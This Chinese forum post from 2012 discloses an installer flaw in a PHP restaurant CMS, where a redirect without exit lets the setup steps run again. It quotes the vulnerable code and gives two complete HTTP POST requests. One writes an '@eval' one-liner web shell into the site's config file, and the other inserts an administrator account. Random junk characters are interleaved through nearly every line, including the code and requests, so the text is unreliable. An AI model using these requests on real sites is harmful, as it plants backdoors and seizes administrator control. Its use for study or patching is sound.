问题出在/install/index.php文件。在程序安装完后,会在程序根目录下生成install.lock文件。而/install/index.php在判断是否有install.lock时出现错误。% i( i/ g0 o5 \, A" [2 P C
9 B/ N6 r% D# x3 x4 ?7 j# o
<?php5 n0 L/ y- Y7 h' ]3 |
if(file_exists("../install.lock"))4 S" p1 g* b$ p% s& l0 L/ r6 P; H
{% R4 z! W4 K% A" p) ?1 a
header("Location: ../");//没有退出
1 A ]/ ^9 ]! Y7 u# Z}
2 ]( J! z7 y7 w, T' p/ M1 U ; |+ P0 J5 y6 w/ o
//echo 'tst';exit;1 x& K3 @* x) |, K/ q/ m
require_once("init.php");
4 G6 f/ ^! k% p! v2 [if(empty($_REQUEST['step']) || $_REQUEST['step']==1)
, B0 i* ~6 }: S x# E$ t{
9 k+ d' k' A9 H' Z( K可见在/install/index.php存在时,只是header做了302重定向并没有退出,也就是说下面的逻辑还是会执行的。在这里至少可以产生两个漏洞。
0 @3 b0 Q- S3 ?, Y5 z) k% ~# n. v2 }6 m$ i3 v3 G/ {& z
1、getshell(很危险)
- [' I) R* C0 j# ], fif(empty($_REQUEST['step']) || $_REQUEST['step']==1)
- W" P3 m# `9 ]! q* M2 m{
) O6 L" b% ~- m5 _0 c$smarty->assign("step",1);
6 G `' F* d! ]& D% L1 m( a$smarty->display("index.html");( v9 C5 j0 b& y& ~ `
}elseif($_REQUEST['step']==2)
1 U+ I( c# c4 Z' {, p$ i5 V{1 r9 v0 r5 ^0 }) H i
$mysql_host=trim($_POST['mysql_host']);; s$ S. Y5 ?' n' V1 @, K
$mysql_user=trim($_POST['mysql_user']);$ B0 I K3 i i& e9 f$ o- ^
$mysql_pwd=trim($_POST['mysql_pwd']);0 q% E5 K0 g1 s6 F' X/ G( _
$mysql_db=trim($_POST['mysql_db']);5 u4 l/ { H8 u) q
$tblpre=trim($_POST['tblpre']);# }- M u+ @7 J- l1 B
$domain==trim($_POST['domain']);
& y$ {8 \6 |1 H $str="<?php \r\n";
0 G' o: K+ T3 M6 X+ @3 D {0 r, m; M $str.='define("MYSQL_HOST","'.$mysql_host.'");'."\r\n";6 p1 H; a! ~9 Y$ F+ S- e/ t
$str.='define("MYSQL_USER","'.$mysql_user.'");'."\r\n";
$ i7 b( M" y4 Y6 d4 C( h' e $str.='define("MYSQL_PWD","'.$mysql_pwd.'");'."\r\n";$ h1 v% z" _, l
$str.='define("MYSQL_DB","'.$mysql_db.'");'."\r\n";2 A) T* |6 [' m/ [
$str.='define("MYSQL_CHARSET","GBK");'."\r\n";7 e8 _) v, H- P5 q* C$ d& C
$str.='define("TABLE_PRE","'.$tblpre.'");'."\r\n";
0 k5 y$ ?" N0 Z$ Y- `+ d+ G $str.='define("DOMAIN","'.$domain.'");'."\r\n";& `# z) r \/ L$ p$ D
$str.='define("SKINS","default");'."\r\n";) k. |. g/ B1 V1 ?, Y: [
$str.='?>';
% `* s9 e; K3 P file_put_contents("../config/config.inc.php",$str);//将提交的数据写入php文件
7 l& ^9 {: c! t( M& e上面的代码将POST的数据直接写入了../config/config.inc.php文件,那么我们提交如下POST包,即可获得一句话木马+ ~ }/ g' F) \" X7 A
POST /canting/install/index.php?m=index&step=2 HTTP/1.1
( e# @' p/ |. p3 y. g7 dHost: 192.168.80.129& z1 Q' c; Y0 P1 f# J; k
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
0 L6 I. u7 s8 DAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
) b) k8 k8 M6 @' ?* x* tAccept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.36 E5 S( {" a# o2 ]1 e3 H
Accept-Encoding: gzip, deflate
+ \( K; U: r. [- j# p9 EReferer: http://192.168.80.129/canting/install/index.php?step=1; R' O3 ]3 X- ]; Z
Cookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc42
7 E" v6 w# n- u; T+ i( `Content-Type: application/x-www-form-urlencoded7 ^; { z: Q: ~1 B# R7 J" ?/ p) k
Content-Length: 1263 J9 p1 R4 C% c( _3 M
7 y5 }. T) K6 b; T7 J/ U) M) f% Zmysql_host=test");@eval($_POST[x]);?>//&mysql_user=1&mysql_pwd=2&mysql_db=3&tblpre=koufu_&domain=www&button=%CF%C2%D2%BB%B2%BD
% `' _9 i7 U% j0 e- X9 \但是这个方法很危险,将导致网站无法运行。0 B. @ d& L- d4 m8 H0 ?4 t
5 P. R+ `. P& u/ A! s+ @. b7 E. p2、直接添加管理员
$ C2 V ?$ w9 N L. e
0 P4 P$ Q5 t S7 {; Relseif($_REQUEST['step']==5)$ `, F6 K# Y$ J9 Y2 C2 v4 w
{2 P3 r8 H% s/ g6 }: y" j
if($_POST)% R0 K. n8 O, K5 A; ~& K
{ require_once("../config/config.inc.php");7 g w( L7 w9 K9 J5 H. k
$link=mysql_connect(MYSQL_HOST,MYSQL_USER,MYSQL_PWD);
L7 d6 F3 R+ A/ H+ w9 G2 S: \ mysql_select_db(MYSQL_DB,$link);4 {7 i9 s3 m2 y, b8 s* J) ^
mysql_query("SET NAMES ".MYSQL_CHARSET );2 ?; z9 T- }+ l
mysql_query("SET sql_mode=''");
1 p9 Q; g. e: W8 b4 B4 I. L2 v7 Q% S- j( ^1 r/ t& i" C2 _, u
$adminname=trim($_POST['adminname']); x* e- a9 c6 x1 u' Z$ U$ C
$pwd1=trim($_POST['pwd1']);
6 T4 F9 F$ N4 [8 k7 J& A3 ? $pwd2=trim($_POST['pwd2']);
" O% F( I+ y; b1 W' h6 t; J if(empty($adminname))
4 p! X" f6 d2 N, S9 X: N9 o0 L$ }6 e0 ? {: a: p- d, e/ I: A
! G+ t1 e; x- i: r V# F echo "<script>alert('管理员不能为空');history.go(-1);</script>";
) Z6 k% G' h5 K" I$ o! Z$ f exit();1 M7 g9 Z" {0 c; D% _/ Z" d7 C9 |& o5 t
}2 w$ _3 |! z. H3 T
if(($pwd1!=$pwd2) or empty($pwd1))
0 P7 [, Q! e3 |6 M5 o0 a {
2 y( y( e+ P% k7 j: e echo "<script>alert('两次输入的密码不一致');history.go(-1);</script>";//这里也是没有退出
; \, s3 t4 j4 G( W/ g) K% y. L1 W' m }6 S0 N3 F# S! R0 A1 I
mysql_query("insert into ".TABLE_PRE."admin(adminname,password,isfounder) values('$adminname','".umd5($pwd1)."',1)");//直接可以插入一个管理员
' x' K) e" f2 c4 r v }5 L* { o, C/ o1 O. y; P2 e
这样的话我们就可以直接插入一个qingshen/qingshen的管理员帐号,语句如下:
; a" U( x% W5 I) G3 mPOST /canting/install/index.php?m=index&step=5 HTTP/1.1: ~9 L$ L: ~5 A! a" ]8 w% z3 N
Host: 192.168.80.129/ l" k s% d$ k B$ t
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/17.0 Firefox/17.0
" M8 Q0 x$ h- z9 M9 `3 F, V" _Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8- h& O' d2 C; X+ z! {7 u* [' o% C
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3, d3 V4 o! x+ X% x3 R! i# _/ O8 w
Accept-Encoding: gzip, deflate1 o* w2 n5 u) X1 a
Referer: http://www.2cto.com /canting/install/index.php?step=1
) U- Y6 n7 X* N& ~& V1 DCookie: ck_ss_id=1354023211djfa6ggefdifvoa3kvhi61sc42; PHPSESSID=djfa6ggefdifvoa3kvhi61sc422 R8 s0 n2 p. v: y
Content-Type: application/x-www-form-urlencoded
# G7 u- n/ _* T3 W; U* i W. _$ FContent-Length: 46
% u, V' P% b9 `: p5 O5 v, W8 Z
3 h. b/ `/ a& i/ Q( E) h9 d" Radminname=qingshen&pwd1=qingshen&pwd2=qingshen
2 ~; m% Z, V. B$ X |
发表于 2012-12-4 11:13:44
收藏
支持
反对